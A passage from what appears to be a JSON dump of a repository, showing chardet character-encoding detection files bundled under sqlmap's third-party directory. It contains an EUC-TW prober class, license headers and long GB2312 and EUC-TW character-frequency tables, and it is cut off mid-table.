838,3004,3697,2272,2763,2454,3819,1938,2050,3998,1309,3099,2242,1181,7807,  # 6630\n1136,2206,3820,2370,1446,4207,2305,4498,7808,7809,4208,1055,2605, 484,3698,7810,  # 6646\n3999, 625,4209,2273,3368,1499,4210,4000,7811,4001,4211,3222,2274,2275,3476,7812,  # 6662\n7813,2764, 808,2606,3699,3369,4002,4212,3100,2532, 526,3370,3821,4213, 955,7814,  # 6678\n1620,4214,2637,2427,7815,1429,3700,1669,1831, 994, 928,7816,3578,1260,7817,7818,  # 6694\n7819,1948,2288, 741,2919,1626,4215,2729,2455, 867,1184, 362,3371,1392,7820,7821,  # 6710\n4003,4216,1770,1736,3223,2920,4499,4500,1928,2698,1459,1158,7822,3050,3372,2877,  # 6726\n1292,1929,2506,2842,3701,1985,1187,2071,2014,2607,4217,7823,2566,2507,2169,3702,  # 6742\n2483,3299,7824,3703,4501,7825,7826, 666,1003,3005,1022,3579,4218,7827,4502,1813,  # 6758\n2253, 574,3822,1603, 295,1535, 705,3823,4219, 283, 858, 417,7828,7829,3224,4503,  # 6774\n4504,3051,1220,1889,1046,2276,2456,4004,1393,1599, 689,2567, 388,4220,7830,2484,  # 6790\n 802,7831,2798,3824,2060,1405,2254,7832,4505,3825,2109,1052,1345,3225,1585,7833,  # 6806\n 809,7834,7835,7836, 575,2730,3477, 956,1552,1469,1144,2323,7837,2324,1560,2457,  # 6822\n3580,3226,4005, 616,2207,3155,2180,2289,7838,1832,7839,3478,4506,7840,1319,3704,  # 6838\n3705,1211,3581,1023,3227,1293,2799,7841,7842,7843,3826, 607,2306,3827, 762,2878,  # 6854\n1439,4221,1360,7844,1485,3052,7845,4507,1038,4222,1450,2061,2638,4223,1379,4508,  # 6870\n2585,7846,7847,4224,1352,1414,2325,2921,1172,7848,7849,3828,3829,7850,1797,1451,  # 6886\n7851,7852,7853,7854,2922,4006,4007,2485,2346, 411,4008,4009,3582,3300,3101,4509,  # 6902\n1561,2664,1452,4010,1375,7855,7856,  47,2959, 316,7857,1406,1591,2923,3156,7858,  # 6918\n1025,2141,3102,3157, 354,2731, 884,2224,4225,2407, 508,3706, 726,3583, 996,2428,  # 6934\n3584, 729,7859, 392,2191,1453,4011,4510,3707,7860,7861,2458,3585,2608,1675,2800,  # 6950\n 919,2347,2960,2348,1270,4511,4012,  73,7862,7863, 647,7864,3228,2843,2255,1550,  # 6966\n1346,3006,7865,1332, 883,3479,7866,7867,7868,7869,3301,2765,7870,1212, 831,1347,  # 6982\n4226,4512,2326,3830,1863,3053, 720,3831,4513,4514,3832,7871,4227,7872,7873,4515,  # 6998\n7874,7875,1798,4516,3708,2609,4517,3586,1645,2371,7876,7877,2924, 669,2208,2665,  # 7014\n2429,7878,2879,7879,7880,1028,3229,7881,4228,2408,7882,2256,1353,7883,7884,4518,  # 7030\n3158, 518,7885,4013,7886,4229,1960,7887,2142,4230,7888,7889,3007,2349,2350,3833,  # 7046\n 516,1833,1454,4014,2699,4231,4519,2225,2610,1971,1129,3587,7890,2766,7891,2961,  # 7062\n1422, 577,1470,3008,1524,3373,7892,7893, 432,4232,3054,3480,7894,2586,1455,2508,  # 7078\n2226,1972,1175,7895,1020,2732,4015,3481,4520,7896,2733,7897,1743,1361,3055,3482,  # 7094\n2639,4016,4233,4521,2290, 895, 924,4234,2170, 331,2243,3056, 166,1627,3057,1098,  # 7110\n7898,1232,2880,2227,3374,4522, 657, 403,1196,2372, 542,3709,3375,1600,4235,3483,  # 7126\n7899,4523,2767,3230, 576, 530,1362,7900,4524,2533,2666,3710,4017,7901, 842,3834,  # 7142\n7902,2801,2031,1014,4018, 213,2700,3376, 665, 621,4236,7903,3711,2925,2430,7904,  # 7158\n2431,3302,3588,3377,7905,4237,2534,4238,4525,3589,1682,4239,3484,1380,7906, 724,  # 7174\n2277, 600,1670,7907,1337,1233,4526,3103,2244,7908,1621,4527,7909, 651,4240,7910,  # 7190\n1612,4241,2611,7911,2844,7912,2734,2307,3058,7913, 716,2459,3059, 174,1255,2701,  # 7206\n4019,3590, 548,1320,1398, 728,4020,1574,7914,1890,1197,3060,4021,7915,3061,3062,  # 7222\n3712,3591,3713, 747,7916, 635,4242,4528,7917,7918,7919,4243,7920,7921,4529,7922,  # 7238\n3378,4530,2432, 451,7923,3714,2535,2072,4244,2735,4245,4022,7924,1764,4531,7925,  # 7254\n4246, 350,7926,2278,2390,2486,7927,4247,4023,2245,1434,4024, 488,4532, 458,4248,  # 7270\n4025,3715, 771,1330,2391,3835,2568,3159,2159,2409,1553,2667,3160,4249,7928,2487,  # 7286\n2881,2612,1720,2702,4250,3379,4533,7929,2536,4251,7930,3231,4252,2768,7931,2015,  # 7302\n2736,7932,1155,1017,3716,3836,7933,3303,2308, 201,1864,4253,1430,7934,4026,7935,  # 7318\n7936,7937,7938,7939,4254,1604,7940, 414,1865, 371,2587,4534,4535,3485,2016,3104,  # 7334\n4536,1708, 960,4255, 887, 389,2171,1536,1663,1721,7941,2228,4027,2351,2926,1580,  # 7350\n7942,7943,7944,1744,7945,2537,4537,4538,7946,4539,7947,2073,7948,7949,3592,3380,  # 7366\n2882,4256,7950,4257,2640,3381,2802, 673,2703,2460, 709,3486,4028,3593,4258,7951,  # 7382\n1148, 502, 634,7952,7953,1204,4540,3594,1575,4541,2613,3717,7954,3718,3105, 948,  # 7398\n3232, 121,1745,3837,1110,7955,4259,3063,2509,3009,4029,3719,1151,1771,3838,1488,  # 7414\n4030,1986,7956,2433,3487,7957,7958,2093,7959,4260,3839,1213,1407,2803, 531,2737,  # 7430\n2538,3233,1011,1537,7960,2769,4261,3106,1061,7961,3720,3721,1866,2883,7962,2017,  # 7446\n 120,4262,4263,2062,3595,3234,2309,3840,2668,3382,1954,4542,7963,7964,3488,1047,  # 7462\n2704,1266,7965,1368,4543,2845, 649,3383,3841,2539,2738,1102,2846,2669,7966,7967,  # 7478\n1999,7968,1111,3596,2962,7969,2488,3842,3597,2804,1854,3384,3722,7970,7971,3385,  # 7494\n2410,2884,3304,3235,3598,7972,2569,7973,3599,2805,4031,1460, 856,7974,3600,7975,  # 7510\n2885,2963,7976,2886,3843,7977,4264, 632,2510, 875,3844,1697,3845,2291,7978,7979,  # 7526\n4544,3010,1239, 580,4545,4265,7980, 914, 936,2074,1190,4032,1039,2123,7981,7982,  # 7542\n7983,3386,1473,7984,1354,4266,3846,7985,2172,3064,4033, 915,3305,4267,4268,3306,  # 7558\n1605,1834,7986,2739, 398,3601,4269,3847,4034, 328,1912,2847,4035,3848,1331,4270,  # 7574\n3011, 937,4271,7987,3602,4036,4037,3387,2160,4546,3388, 524, 742, 538,3065,1012,  # 7590\n7988,7989,3849,2461,7990, 658,1103, 225,3850,7991,7992,4547,7993,4548,7994,3236,  # 7606\n1243,7995,4038, 963,2246,4549,7996,2705,3603,3161,7997,7998,2588,2327,7999,4550,  # 7622\n8000,8001,8002,3489,3307, 957,3389,2540,2032,1930,2927,2462, 870,2018,3604,1746,  # 7638\n2770,2771,2434,2463,8003,3851,8004,3723,3107,3724,3490,3390,3725,8005,1179,3066,  # 7654\n8006,3162,2373,4272,3726,2541,3163,3108,2740,4039,8007,3391,1556,2542,2292, 977,  # 7670\n2887,2033,4040,1205,3392,8008,1765,3393,3164,2124,1271,1689, 714,4551,3491,8009,  # 7686\n2328,3852, 533,4273,3605,2181, 617,8010,2464,3308,3492,2310,8011,8012,3165,8013,  # 7702\n8014,3853,1987, 618, 427,2641,3493,3394,8015,8016,1244,1690,8017,2806,4274,4552,  # 7718\n8018,3494,8019,8020,2279,1576, 473,3606,4275,3395, 972,8021,3607,8022,3067,8023,  # 7734\n8024,4553,4554,8025,3727,4041,4042,8026, 153,4555, 356,8027,1891,2888,4276,2143,  # 7750\n 408, 803,2352,8028,3854,8029,4277,1646,2570,2511,4556,4557,3855,8030,3856,4278,  # 7766\n8031,2411,3396, 752,8032,8033,1961,2964,8034, 746,3012,2465,8035,4279,3728, 698,  # 7782\n4558,1892,4280,3608,2543,4559,3609,3857,8036,3166,3397,8037,1823,1302,4043,2706,  # 7798\n3858,1973,4281,8038,4282,3167, 823,1303,1288,1236,2848,3495,4044,3398, 774,3859,  # 7814\n8039,1581,4560,1304,2849,3860,4561,8040,2435,2161,1083,3237,4283,4045,4284, 344,  # 7830\n1173, 288,2311, 454,1683,8041,8042,1461,4562,4046,2589,8043,8044,4563, 985, 894,  # 7846\n8045,3399,3168,8046,1913,2928,3729,1988,8047,2110,1974,8048,4047,8049,2571,1194,  # 7862\n 425,8050,4564,3169,1245,3730,4285,8051,8052,2850,8053, 636,4565,1855,3861, 760,  # 7878\n1799,8054,4286,2209,1508,4566,4048,1893,1684,2293,8055,8056,8057,4287,4288,2210,  # 7894\n 479,8058,8059, 832,8060,4049,2489,8061,2965,2490,3731, 990,3109, 627,1814,2642,  # 7910\n4289,1582,4290,2125,2111,3496,4567,8062, 799,4291,3170,8063,4568,2112,1737,3013,  # 7926\n1018, 543, 754,4292,3309,1676,4569,4570,4050,8064,1489,8065,3497,8066,2614,2889,  # 7942\n4051,8067,8068,2966,8069,8070,8071,8072,3171,4571,4572,2182,1722,8073,3238,3239,  # 7958\n1842,3610,1715, 481, 365,1975,1856,8074,8075,1962,2491,4573,8076,2126,3611,3240,  # 7974\n 433,1894,2063,2075,8077, 602,2741,8078,8079,8080,8081,8082,3014,1628,3400,8083,  # 7990\n3172,4574,4052,2890,4575,2512,8084,2544,2772,8085,8086,8087,3310,4576,2891,8088,  # 8006\n4577,8089,2851,4578,4579,1221,2967,4053,2513,8090,8091,8092,1867,1989,8093,8094,  # 8022\n8095,1895,8096,8097,4580,1896,4054, 318,8098,2094,4055,4293,8099,8100, 485,8101,  # 8038\n 938,3862, 553,2670, 116,8102,3863,3612,8103,3498,2671,2773,3401,3311,2807,8104,  # 8054\n3613,2929,4056,1747,2930,2968,8105,8106, 207,8107,8108,2672,4581,2514,8109,3015,  # 8070\n 890,3614,3864,8110,1877,3732,3402,8111,2183,2353,3403,1652,8112,8113,8114, 941,  # 8086\n2294, 208,3499,4057,2019, 330,4294,3865,2892,2492,3733,4295,8115,8116,8117,8118,  # 8102\n)\n\n"
  },
  {
    "path": "sqlmap/thirdparty/chardet/euctwprober.py",
    "content": "######################## BEGIN LICENSE BLOCK ########################\n# The Original Code is mozilla.org code.\n#\n# The Initial Developer of the Original Code is\n# Netscape Communications Corporation.\n# Portions created by the Initial Developer are Copyright (C) 1998\n# the Initial Developer. All Rights Reserved.\n#\n# Contributor(s):\n#   Mark Pilgrim - port to Python\n#\n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 2.1 of the License, or (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this library; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA\n# 02110-1301  USA\n######################### END LICENSE BLOCK #########################\n\nfrom .mbcharsetprober import MultiByteCharSetProber\nfrom .codingstatemachine import CodingStateMachine\nfrom .chardistribution import EUCTWDistributionAnalysis\nfrom .mbcssm import EUCTW_SM_MODEL\n\nclass EUCTWProber(MultiByteCharSetProber):\n    def __init__(self):\n        super(EUCTWProber, self).__init__()\n        self.coding_sm = CodingStateMachine(EUCTW_SM_MODEL)\n        self.distribution_analyzer = EUCTWDistributionAnalysis()\n        self.reset()\n\n    @property\n    def charset_name(self):\n        return \"EUC-TW\"\n\n    @property\n    def language(self):\n        return \"Taiwan\"\n"
  },
  {
    "path": "sqlmap/thirdparty/chardet/gb2312freq.py",
    "content": "######################## BEGIN LICENSE BLOCK ########################\n# The Original Code is Mozilla Communicator client code.\n#\n# The Initial Developer of the Original Code is\n# Netscape Communications Corporation.\n# Portions created by the Initial Developer are Copyright (C) 1998\n# the Initial Developer. All Rights Reserved.\n#\n# Contributor(s):\n#   Mark Pilgrim - port to Python\n#\n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 2.1 of the License, or (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this library; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA\n# 02110-1301  USA\n######################### END LICENSE BLOCK #########################\n\n# GB2312 most frequently used character table\n#\n# Char to FreqOrder table , from hz6763\n\n# 512  --> 0.79  -- 0.79\n# 1024 --> 0.92  -- 0.13\n# 2048 --> 0.98  -- 0.06\n# 6768 --> 1.00  -- 0.02\n#\n# Ideal Distribution Ratio = 0.79135/(1-0.79135) = 3.79\n# Random Distribution Ration = 512 / (3755 - 512) = 0.157\n#\n# Typical Distribution Ratio about 25% of Ideal one, still much higher that RDR\n\nGB2312_TYPICAL_DISTRIBUTION_RATIO = 0.9\n\nGB2312_TABLE_SIZE = 3760\n\nGB2312_CHAR_TO_FREQ_ORDER = (\n1671, 749,1443,2364,3924,3807,2330,3921,1704,3463,2691,1511,1515, 572,3191,2205,\n2361, 224,2558, 479,1711, 963,3162, 440,4060,1905,2966,2947,3580,2647,3961,3842,\n2204, 869,4207, 970,2678,5626,2944,2956,1479,4048, 514,3595, 588,1346,2820,3409,\n 249,4088,1746,1873,2047,1774, 581,1813, 358,1174,3590,1014,1561,4844,2245, 670,\n1636,3112, 889,1286, 953, 556,2327,3060,1290,3141, 613, 185,3477,1367, 850,3820,\n1715,2428,2642,2303,2732,3041,2562,2648,3566,3946,1349, 388,3098,2091,1360,3585,\n 152,1687,1539, 738,1559,  59,1232,2925,2267,1388,1249,1741,1679,2960, 151,1566,\n1125,1352,4271, 924,4296, 385,3166,4459, 310,1245,2850,  70,3285,2729,3534,3575,\n2398,3298,3466,1960,2265, 217,3647, 864,1909,2084,4401,2773,1010,3269,5152, 853,\n3051,3121,1244,4251,1895, 364,1499,1540,2313,1180,3655,2268, 562, 715,2417,3061,\n 544, 336,3768,2380,1752,4075, 950, 280,2425,4382, 183,2759,3272, 333,4297,2155,\n1688,2356,1444,1039,4540, 736,1177,3349,2443,2368,2144,2225, 565, 196,1482,3406,\n 927,1335,4147, 692, 878,1311,1653,3911,3622,1378,4200,1840,2969,3149,2126,1816,\n2534,1546,2393,2760, 737,2494,  13, 447, 245,2747,  38,2765,2129,2589,1079, 606,\n 360, 471,3755,2890, 404, 848, 699,1785,1236, 370,2221,1023,3746,2074,2026,2023,\n2388,1581,2119, 812,1141,3091,2536,1519, 804,2053, 406,1596,1090, 784, 548,4414,\n1806,2264,2936,1100, 343,4114,5096, 622,3358, 743,3668,1510,1626,5020,3567,2513,\n3195,4115,5627,2489,2991,  24,2065,2697,1087,2719,  48,1634, 315,  68, 985,2052,\n 198,2239,1347,1107,1439, 597,2366,2172, 871,3307, 919,2487,2790,1867, 236,2570,\n1413,3794, 906,3365,3381,1701,1982,1818,1524,2924,1205, 616,2586,2072,2004, 575,\n 253,3099,  32,1365,1182, 197,1714,2454,1201, 554,3388,3224,2748, 756,2587, 250,\n2567,1507,1517,3529,1922,2761,2337,3416,1961,1677,2452,2238,3153, 615, 911,1506,\n1474,2495,1265,1906,2749,3756,3280,2161, 898,2714,1759,3450,2243,2444, 563,  26,\n3286,2266,3769,3344,2707,3677, 611,1402, 531,1028,2871,4548,1375, 261,2948, 835,\n1190,4134, 353, 840,2684,1900,3082,1435,2109,1207,1674, 329,1872,2781,4055,2686,\n2104, 608,3318,2423,2957,2768,1108,3739,3512,3271,3985,2203,1771,3520,1418,2054,\n1681,1153, 225,1627,2929, 162,2050,2511,3687,1954, 124,1859,2431,1684,3032,2894,\n 585,4805,3969,2869,2704,2088,2032,2095,3656,2635,4362,2209, 256, 518,2042,2105,\n3777,3657, 643,2298,1148,1779, 190, 989,3544, 414,  11,2135,2063,2979,1471, 403,\n3678, 126, 770,1563, 671,2499,3216,2877, 600,1179, 307,2805,4937,1268,1297,2694,\n 252,4032,1448,1494,1331,1394, 127,2256, 222,1647,1035,1481,3056,1915,1048, 873,\n3651, 210,  33,1608,2516, 200,1520, 415, 102,   0,3389,1287, 817,  91,3299,2940,\n 836,1814, 549,2197,1396,1669,2987,3582,2297,2848,4528,1070, 687,  20,1819, 121,\n1552,1364,1461,1968,2617,3540,2824,2083, 177, 948,4938,2291, 110,4549,2066, 648,\n3359,1755,2110,2114,4642,4845,1693,3937,3308,1257,1869,2123, 208,1804,3159,2992,\n2531,2549,3361,2418,1350,2347,2800,2568,1291,2036,2680,  72, 842,1990, 212,1233,\n1154,1586,  75,2027,3410,4900,1823,1337,2710,2676, 728,2810,1522,3026,4995, 157,\n 755,1050,4022, 710, 785,1936,2194,2085,1406,2777,2400, 150,1250,4049,1206, 807,\n1910, 534, 529,3309,1721,1660, 274,  39,2827, 661,2670,1578, 925,3248,3815,1094,\n4278,4901,4252,  41,1150,3747,2572,2227,4501,3658,4902,3813,3357,3617,2884,2258,\n 887, 538,4187,3199,1294,2439,3042,2329,2343,2497,1255, 107, 543,1527, 521,3478,\n3568, 194,5062,  15, 961,3870,1241,1192,2664,  66,5215,3260,2111,1295,1127,2152,\n3805,4135, 901,1164,1976, 398,1278, 530,1460, 748, 904,1054,1966,1426,  53,2909,\n 509, 523,2279,1534, 536,1019, 239,1685, 460,2353, 673,1065,2401,3600,4298,2272,\n1272,2363, 284,1753,3679,4064,1695,  81, 815,2677,2757,2731,1386, 859, 500,4221,\n2190,2566, 757,1006,2519,2068,1166,1455, 337,2654,3203,1863,1682,1914,3025,1252,\n1409,1366, 847, 714,2834,2038,3209, 964,2970,1901, 885,2553,1078,1756,3049, 301,\n1572,3326, 688,2130,1996,2429,1805,1648,2930,3421,2750,3652,3088, 262,1158,1254,\n 389,1641,1812, 526,1719, 923,2073,1073,1902, 468, 489,4625,1140, 857,2375,3070,\n3319,2863, 380, 116,1328,2693,1161,2244, 273,1212,1884,2769,3011,1775,1142, 461,\n3066,1200,2147,2212, 790, 702,2695,4222,1601,1058, 434,2338,5153,3640,  67,2360,\n4099,2502, 618,3472,1329, 416,1132, 830,2782,1807,2653,3211,3510,1662, 192,2124,\n 296,3979,1739,1611,3684,  23, 118, 324, 446,1239,1225, 293,2520,3814,3795,2535,\n3116,  17,1074, 467,2692,2201, 387,2922,  45,1326,3055,1645,3659,2817, 958, 243,\n1903,2320,1339,2825,1784,3289, 356, 576, 865,2315,2381,3377,3916,1088,3122,1713,\n1655, 935, 628,4689,1034,1327, 441, 800, 720, 894,1979,2183,1528,5289,2702,1071,\n4046,3572,2399,1571,3281,  79, 761,1103, 327, 134, 758,1899,1371,1615, 879, 442,\n 215,2605,2579, 173,2048,2485,1057,2975,3317,1097,2253,3801,4263,1403,1650,2946,\n 814,4968,3487,1548,2644,1567,1285,   2, 295,2636,  97, 946,3576, 832, 141,4257,\n3273, 760,3821,3521,3156,2607, 949,1024,1733,1516,1803,1920,2125,2283,2665,3180,\n1501,2064,3560,2171,1592, 803,3518,1416, 732,3897,4258,1363,1362,2458, 119,1427,\n 602,1525,2608,1605,1639,3175, 694,3064,  10, 465,  76,2000,4846,4208, 444,3781,\n1619,3353,2206,1273,3796, 740,2483, 320,1723,2377,3660,2619,1359,1137,1762,1724,\n2345,2842,1850,1862, 912, 821,1866, 612,2625,1735,2573,3369,1093, 844,  89, 937,\n 930,1424,3564,2413,2972,1004,3046,3019,2011, 711,3171,1452,4178, 428, 801,1943,\n 432, 445,2811, 206,4136,1472, 730, 349,  73, 397,2802,2547, 998,1637,1167, 789,\n 396,3217, 154,1218, 716,1120,1780,2819,4826,1931,3334,3762,2139,1215,2627, 552,\n3664,3628,3232,1405,2383,3111,1356,2652,3577,3320,3101,1703, 640,1045,1370,1246,\n4996, 371,1575,2436,1621,2210, 984,4033,1734,2638,  16,4529, 663,2755,3255,1451,\n3917,2257,1253,1955,2234,1263,2951, 214,1229, 617, 485, 359,1831,1969, 473,2310,\n 750,2058, 165,  80,2864,2419, 361,4344,2416,2479,1134, 796,3726,1266,2943, 860,\n2715, 938, 390,2734,1313,1384, 248, 202, 877,1064,2854, 522,3907, 279,1602, 297,\n2357, 395,3740, 137,2075, 944,4089,2584,1267,3802,  62,1533,2285, 178, 176, 780,\n2440, 201,3707, 590, 478,1560,4354,2117,1075,  30,  74,4643,4004,1635,1441,2745,\n 776,2596, 238,1077,1692,1912,2844, 605, 499,1742,3947, 241,3053, 980,1749, 936,\n2640,4511,2582, 515,1543,2162,5322,2892,2993, 890,2148,1924, 665,1827,3581,1032,\n 968,3163, 339,1044,1896, 270, 583,1791,1720,4367,1194,3488,3669,  43,2523,1657,\n 163,2167, 290,1209,1622,3378, 550, 634,2508,2510, 695,2634,2384,2512,1476,1414,\n 220,1469,2341,2138,2852,3183,2900,4939,2865,3502,1211,3680, 854,3227,1299,2976,\n3172, 186,2998,1459, 443,1067,3251,1495, 321,1932,3054, 909, 753,1410,1828, 436,\n2441,1119,1587,3164,2186,1258, 227, 231,1425,1890,3200,3942, 247, 959, 725,5254,\n2741, 577,2158,2079, 929, 120, 174, 838,2813, 591,1115, 417,2024,  40,3240,1536,\n1037, 291,4151,2354, 632,1298,2406,2500,3535,1825,1846,3451, 205,1171, 345,4238,\n  18,1163, 811, 685,2208,1217, 425,1312,1508,1175,4308,2552,1033, 587,1381,3059,\n2984,3482, 340,1316,4023,3972, 792,3176, 519, 777,4690, 918, 933,4130,2981,3741,\n  90,3360,2911,2200,5184,4550, 609,3079,2030, 272,3379,2736, 363,3881,1130,1447,\n 286, 779, 357,1169,3350,3137,1630,1220,2687,2391, 747,1277,3688,2618,2682,2601,\n1156,3196,5290,4034,3102,1689,3596,3128, 874, 219,2783, 798, 508,1843,2461, 269,\n1658,1776,1392,1913,2983,3287,2866,2159,2372, 829,4076,  46,4253,2873,1889,1894,\n 915,1834,1631,2181,2318, 298, 664,2818,3555,2735, 954,3228,3117, 527,3511,2173,\n 681,2712,3033,2247,2346,3467,1652, 155,2164,3382, 113,1994, 450, 899, 494, 994,\n1237,2958,1875,2336,1926,3727, 545,1577,1550, 633,3473, 204,1305,3072,2410,1956,\n2471, 707,2134, 841,2195,2196,2663,3843,1026,4940, 990,3252,4997, 368,1092, 437,\n3212,3258,1933,1829, 675,2977,2893, 412, 943,3723,4644,3294,3283,2230,2373,5154,\n2389,2241,2661,2323,1404,2524, 593, 787, 677,3008,1275,2059, 438,2709,2609,2240,\n2269,2246,1446,  36,1568,1373,3892,1574,2301,1456,3962, 693,2276,5216,2035,1143,\n2720,1919,1797,1811,2763,4137,2597,1830,1699,1488,1198,2090, 424,1694, 312,3634,\n3390,4179,3335,2252,1214, 561,1059,3243,2295,2561, 975,5155,2321,2751,3772, 472,\n1537,3282,3398,1047,2077,2348,2878,1323,3340,3076, 690,2906,  51, 369, 170,3541,\n1060,2187,2688,3670,2541,1083,1683, 928,3918, 459, 109,4427, 599,3744,4286, 143,\n2101,2730,2490,  82,1588,3036,2121, 281,1860, 477,4035,1238,2812,3020,2716,3312,\n1530,2188,2055,1317, 843, 636,1808,1173,3495, 649, 181,1002, 147,3641,1159,2414,\n3750,2289,2795, 813,3123,2610,1136,4368,   5,3391,4541,2174, 420, 429,1728, 754,\n1228,2115,2219, 347,2223,2733, 735,1518,3003,2355,3134,1764,3948,3329,1888,2424,\n1001,1234,1972,3321,3363,1672,1021,1450,1584, 226, 765, 655,2526,3404,3244,2302,\n3665, 731, 594,2184, 319,1576, 621, 658,2656,4299,2099,3864,1279,2071,2598,2739,\n 795,3086,3699,3908,1707,2352,2402,1382,3136,2475,1465,4847,3496,3865,1085,3004,\n2591,1084, 213,2287,1963,3565,2250, 822, 793,4574,3187,1772,1789,3050, 595,1484,\n1959,2770,1080,2650, 456, 422,2996, 940,3322,4328,4345,3092,2742, 965,2784, 739,\n4124, 952,1358,2498,2949,2565, 332,2698,2378, 660,2260,2473,4194,3856,2919, 535,\n1260,2651,1208,1428,1300,1949,1303,2942, 433,2455,2450,1251,1946, 614,1269, 641,\n1306,1810,2737,3078,2912, 564,2365,1419,1415,1497,4460,2367,2185,1379,3005,1307,\n3218,2175,1897,3063, 682,1157,4040,4005,1712,1160,1941,1399, 394, 402,2952,1573,\n1151,2986,2404, 862, 299,2033,1489,3006, 346, 171,2886,3401,1726,2932, 168,2533,\n  47,2507,1030,3735,1145,3370,1395,1318,1579,3609,4560,2857,4116,1457,2529,1965,\n 504,1036,2690,2988,2405, 745,5871, 849,2397,2056,3081, 863,2359,3857,2096,  99,\n1397,1769,2300,4428,1643,3455,1978,1757,3718,1440,  35,4879,3742,1296,4228,2280,\n 160,5063,1599,2013, 166, 520,3479,1646,3345,3012, 490,1937,1545,1264,2182,2505,\n1096,1188,1369,1436,2421,1667,2792,2460,1270,2122, 727,3167,2143, 806,1706,1012,\n1800,3037, 960,2218,1882, 805, 139,2456,1139,1521, 851,1052,3093,3089, 342,2039,\n 744,5097,1468,1502,1585,2087, 223, 939, 326,2140,2577, 892,2481,1623,4077, 982,\n3708, 135,2131,  87,2503,3114,2326,1106, 876,1616, 547,2997,2831,2093,3441,4530,\n4314,   9,3256,4229,4148, 659,1462,1986,1710,2046,2913,2231,4090,4880,5255,3392,\n3274,1368,3689,4645,1477, 705,3384,3635,1068,1529,2941,1458,3782,1509, 100,1656,\n2548, 718,2339, 408,1590,2780,3548,1838,4117,3719,1345,3530, 717,3442,2778,3220,\n2898,1892,4590,3614,3371,2043,1998,1224,3483, 891, 635, 584,2559,3355, 733,1766,\n1729,1172,3789,1891,2307, 781,2982,2271,1957,1580,5773,2633,2005,4195,3097,1535,\n3213,1189,1934,5693,3262, 586,3118,1324,1598, 517,1564,2217,1868,1893,4445,3728,\n2703,3139,1526,1787,1992,3882,2875,1549,1199,1056,2224,1904,2711,5098,4287, 338,\n1993,3129,3489,2689,1809,2815,1997, 957,1855,3898,2550,3275,3057,1105,1319, 627,\n1505,1911,1883,3526, 698,3629,3456,1833,1431, 746,  77,1261,2017,2296,1977,1885,\n 125,1334,1600, 525,1798,1109,2222,1470,1945, 559,2236,1186,3443,2476,1929,1411,\n2411,3135,1777,3372,2621,1841,1613,3229, 668,1430,1839,2643,2916, 195,1989,2671,\n2358,1387, 629,3205,2293,5256,4439, 123,1310, 888,1879,4300,3021,3605,1003,1162,\n3192,2910,2010, 140,2395,2859,  55,1082,2012,2901, 662, 419,2081,1438, 680,2774,\n4654,3912,1620,1731,1625,5035,4065,2328, 512,1344, 802,5443,2163,2311,2537, 524,\n3399,  98,1155,2103,1918,2606,3925,2816,1393,2465,1504,3773,2177,3963,1478,4346,\n 180,1113,4655,3461,2028,1698, 833,2696,1235,1322,1594,4408,3623,3013,3225,2040,\n3022, 541,2881, 607,3632,2029,1665,1219, 639,1385,1686,1099,2803,3231,1938,3188,\n2858, 427, 676,2772,1168,2025, 454,3253,2486,3556, 230,1950, 580, 791,1991,1280,\n1086,1974,2034, 630, 257,3338,2788,4903,1017,  86,4790, 966,2789,1995,1696,1131,\n 259,3095,4188,1308, 179,1463,5257, 289,4107,1248,  42,3413,1725,2288, 896,1947,\n 774,4474,4254, 604,3430,4264, 392,2514,2588, 452, 237,1408,3018, 988,4531,1970,\n3034,3310, 540,2370,1562,1288,2990, 502,4765,1147,   4,1853,2708, 207, 294,2814,\n4078,2902,2509, 684,  34,3105,3532,2551, 644, 709,2801,2344, 573,1727,3573,3557,\n2021,1081,3100,4315,2100,3681, 199,2263,1837,2385, 146,3484,1195,2776,3949, 997,\n1939,3973,1008,1091,1202,1962,1847,1149,4209,5444,1076, 493, 117,5400,2521, 972,\n1490,2934,1796,4542,2374,1512,2933,2657, 413,2888,1135,2762,2314,2156,1355,2369,\n 766,2007,2527,2170,3124,2491,2593,2632,4757,2437, 234,3125,3591,1898,1750,1376,\n1942,3468,3138, 570,2127,2145,3276,4131, 962, 132,1445,4196,  19, 941,3624,3480,\n3366,1973,1374,4461,3431,2629, 283,2415,2275, 808,2887,3620,2112,2563,1353,3610,\n 955,1089,3103,1053,  96,  88,4097, 823,3808,1583, 399, 292,4091,3313, 421,1128,\n 642,4006, 903,2539,1877,2082, 596,  29,4066,1790, 722,2157, 130, 995,1569, 769,\n1485, 464, 513,2213, 288,1923,1101,2453,4316, 133, 486,2445,  50, 625, 487,2207,\n  57, 423, 481,2962, 159,3729,1558, 491, 303, 482, 501, 240,2837, 112,3648,2392,\n1783, 362,   8,3433,3422, 610,2793,3277,1390,1284,1654,  21,3823, 734, 367, 623,\n 193, 287, 374,1009,1483, 816, 476, 313,2255,2340,1262,2150,2899,1146,2581, 782,\n2116,1659,2018,1880, 255,3586,3314,1110,2867,2137,2564, 986,2767,5185,2006, 650,\n 158, 926, 762, 881,3157,2717,2362,3587, 306,3690,3245,1542,3077,2427,1691,2478,\n2118,2985,3490,2438, 539,2305, 983, 129,1754, 355,4201,2386, 827,2923, 104,1773,\n2838,2771, 411,2905,3919, 376, 767, 122,1114, 828,2422,1817,3506, 266,3460,1007,\n1609,4998, 945,2612,4429,2274, 726,1247,1964,2914,2199,2070,4002,4108, 657,3323,\n1422, 579, 455,2764,4737,1222,2895,1670, 824,1223,1487,2525, 558, 861,3080, 598,\n2659,2515,1967, 752,2583,2376,2214,4180, 977, 704,2464,4999,2622,4109,1210,2961,\n 819,1541, 142,2284,  44, 418, 457,1126,3730,4347,4626,1644,1876,3671,1864, 302,\n1063,5694, 624, 